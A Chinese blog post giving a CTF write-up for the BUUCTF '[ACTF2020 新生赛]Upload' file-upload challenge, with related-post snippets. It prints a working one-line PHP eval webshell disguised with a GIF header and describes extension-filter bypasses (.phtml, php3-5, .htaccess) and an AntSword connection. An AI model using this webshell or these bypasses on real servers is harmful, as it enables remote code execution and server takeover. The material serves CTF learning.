BUU-WEB-[ACTF2020 新生赛]Upload

最新推荐文章于 2024-04-24 20:40:39 发布
最新推荐文章于 2024-04-24 20:40:39 发布
阅读量198 收藏
点赞数
分类专栏: BUU-WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_24033605/article/details/116566125
版权

[ACTF2020 新生赛]Upload

在这里插入图片描述

在这里插入图片描述
文件上传漏洞,上传一句话木马,再尝试用蚁剑或者菜刀连接。
尝试上传一张图片。
在这里插入图片描述
找到了上传保存的位置,接下来开始抓包,改后缀。
先把一句话木马的后缀改成jpg格式(目的是为了绕过checkfile()函数),抓包时再修改成phtml格式。
一句话木马为:

GIF89a? 
<script language="php">eval($_REQUEST[shell])</script>

在这里插入图片描述
成功上传后可以正常访问到。
在这里插入图片描述
然后开始蚁剑连接。
在这里插入图片描述
在这里插入图片描述

flag{0bceba58-6067-4cbd-8793-77644b417840}
TzZzEZ-web
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-Web[ACTF2020 新生]Upload
rumil的博客
06-24 2188
尝试修改后缀为:php1,php2, php3, php4, php5, phps, pht, phtm, phtml。经过测试和验证,当后缀为.phtml时上传成功的同时语句能被解析,可通过蚁剑连接。这次告诉我们这是一个有害的文件,无法正常上传,说明后端也做了过滤,我们尝试绕过。访问成功,验证是否可执行php语句,能被解析。连接成功,添加,并进入到文件目录,找flag。同理图片码也无法进行解析,上传无效。浏览器搜about:config。修改文件后缀,上传成功但无法解析。回到靶机界面,刷新后,再次上传。
[ACTF2020 新生]Upload
pakho_C的博客
02-01 1102
[ACTF2020 新生]Upload 打开靶场 显然是一个文件上传的题目,先直接尝试上传一句话木马 得到提示,应该是白名单验证,可能是只允许上传jpg,png,gif文件,尝试上传图片马 制作图片马 然后上传 上传成功,并且返回了文件路径 访问该路径,确实存在这么一个文件 额,做到这里发现好像做错了,使用图片马的话,没有文件包含漏洞的话蚁剑无法解析图片文件,故无法进行连接,查了很多资料也没找到如何连接 换个思路,也许不是白名单验证,黑名单验证的话可以尝试上传图片然后抓包修改后缀进行绕过 参考文
[ACTF2020 新生]Upload--BUUCTF
XiaoYeZhu_1314的博客
04-24 342
得到:Upload Success!第二步:使用bp抓上传jpg文件的包,在修改文件后缀名为phtml。第一步:上传php文件,他提示,只能上传jpg、png、gif。第四步:拼接访问,连接蚁剑,找到flag。第三步:进行放过,在访问浏览器。
[ACTF 2020 新生] Upload
Web学习之路
05-22 362
文件上传
BUU-Reveser-XMAN2018排位-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位-easywasm(WebAssembly逆向分析)"这个挑战中,参者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
Project-Decoder-Ring
03-27
项目解码器环 项目描述:解码器环 该应用程序具有3种不同的解码器。 1.凯撒密码是一种替换密码,其中明文中... 2.... 3.... “单位”可以是单个字母(最常见),成对的字母,字母的三元组,上述的混合形式,等等。... 屏幕截图:
BUUCTF-Web-[ACTF2020新生]Upload
m0_61851859的博客
03-27 386
4.打开burpsuite进行抓包,修改为php文件类型并将数据包发送回去,发现上传失败。5. 考虑是不是网站对php后缀进行过滤,采取黑名单绕过修改文件后缀为.phtml,上传成功。3.将文件后缀名修改为.jpg类型上传文件,上传成功。(但此时文件有错木马无法连接)1.打开题目在小灯泡那发现了文件上传,因此猜测存在文件上传漏洞。2.尝试上传一句话木马,上传失败仅允许上传弹窗提示的文件类型。7.连接成功并找到flag。6.使用蚁剑进行连接。
0212[ACTF2020 新生]Upload
qq_49849300的博客
02-14 375
这个插件可以批量测试已创建好连接的存活情况,但是需要批量去创建连接,相当于只能完成一半的需求。对于这种允许很多种文件后缀上传但是不执行的题,有必要形成一个较小的字典。我的问题:如何批量连接已上传的脚本,过滤出其中能够成功连接的webshell.用phtml连接则可以看到其实PHP已经上传上去了,只是没法执行。解题思路:上传phtml,蚁剑连接,获取 /flag。这个方法是在.htaccess中设置了禁止的方法。验证php可执行:在其中添加add.php文件。我的问题:如何禁止php3,phP等文件执行。
buuctf [ACTF2020 新生]Upload 1
hintll的博客
06-15 251
看题目的标题应该还是一道文件上传的题目: 打开看看 找到了上传点,先上传一个.php的一句话木马试一下 显示该文件不允许上传,请上传jpg、png、gift结尾的图片 看一下有没有白名单或者黑名单 足迹F12看源码: 看到有个checkfile的函数 看看能不能直接删掉 还真的能被删掉 然后传了一个php文件 但是什么回显都没有 一个是后端也被过滤了一遍 那就试一下这个东西能不能传上去 也不行 那就burpsuit抓包fuzz一下 分析phtml可以有回显 那就写一个phtml的一句话木马 可以参考之前的文
BUUCTF-web-[ACTF2020 新生]Upload 1
qq_47271638的博客
06-22 460
打开靶场 发现网页设计很好看突然就觉得今天挺不错的这可能就是有感而生吧 尝试着上传png文件和php文件 发现png文件上传成功;开始上传php文件 php文件被拦截而且是弹窗拦截初步估计是被前端代码给拦截了前端代码设计了白名单吧 接着用burp抓包然后修改png文件为php文件绕过前端的白名单 同样被检测到了尝试是哪种检测 上传php3,php4,php5以及phtml文件后缀或者在php文件后面加上“ ”空格符绕过检查 或者“.”加点绕过和大小写绕过或者上.htaccess文件将png格式当做ph

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值